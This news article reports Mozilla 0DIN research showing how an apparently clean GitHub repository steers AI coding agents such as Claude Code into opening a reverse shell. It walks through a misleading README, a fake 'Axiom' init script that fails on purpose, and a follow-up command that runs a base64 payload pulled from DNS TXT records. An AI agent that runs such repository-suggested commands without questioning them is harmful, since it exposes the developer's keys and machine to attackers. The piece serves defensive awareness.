Skip to main content
TechnologyJun 29, 2026· 2 min read

'Clean' GitHub Repositories Can Deceive Claude Code and AI Agents: Mozilla Warns of Dangers

Mozilla's 0DIN security team has demonstrated that a completely clean GitHub repository, devoid of any malicious code, can still lead an AI coding agent to install a reverse shell on a developer's computer. The primary target of the demonstration is Anthropic's Claude Code, but researchers claim that the same scheme works with Cursor, GitHub Copilot, and Gemini CLI.

The uniqueness of the attack lies in the absence of suspicious elements to detect. The repository contains only a few scaffolding files, none of which would trigger a security check—neither remote, local, nor those integrated into the agent itself. Its effectiveness stems from the combination of three steps, each harmless when observed in isolation.

Three Harmless Steps, One Dangerous Result

The first file the AI agent processes is a README that describes how to initialize a Python environment using Axiom, presented as a common monitoring tool. The second element is a fake Axiom startup script, programmed to return an error on the first execution. To be helpful and resolve the issue, the agent then executes an equally harmless-sounding command, "python3 -m axiom init," just as suggested by the context.

This is where the third step, the truly dangerous one, hides. Instead of downloading a file from an address that could be scanned by a scanner, the script reads the TXT records of a specific domain's DNS. That record contains a base64 encoded string that, once decoded and executed, opens a reverse shell to the attacker. No infected file to download, no confirmation request to approve: the command appears as a normal initialization operation.

According to the 0DIN researchers, the result is a complete compromise "without exploit code, without alerts, and without any suspicious commands that someone had to approve." Once the shell is obtained, whoever controls the attack inherits the same privileges as the developer: they can read environment variables, steal API keys, access local configuration files, and attempt to establish persistence on the compromised system.

The weakness exploited by the attack is therefore not a classical technical vulnerability, but the behavior of AI coding agents, trained to fix errors they encounter and to complete the assigned task without pausing too much to question the source of the instructions they execute. The more available and proactive the agent is in completing a project's initialization, the more fertile the ground becomes for a scheme of this type.

This discovery comes as the adoption of tools like Claude Code, Cursor, and GitHub Copilot continues to grow among professional and non-professional developers, often with broad permissions on work machines. The authors of the research suggest treating any initialization script that requires the execution of additional commands to "fix" an error with suspicion, especially when the involved package is not widely known or verifiable, and to limit as much as possible the privileges with which these agents operate on untrusted repositories.

Chinese AI Scares the USA: GLM-5.2 Surpasses Opus and Matches Anthropic's Mythos in Some TestsCloudflare Cuts One-Fifth of Its Workforce (Over 1,000 People): The CEO's Theory on Who Risks with AI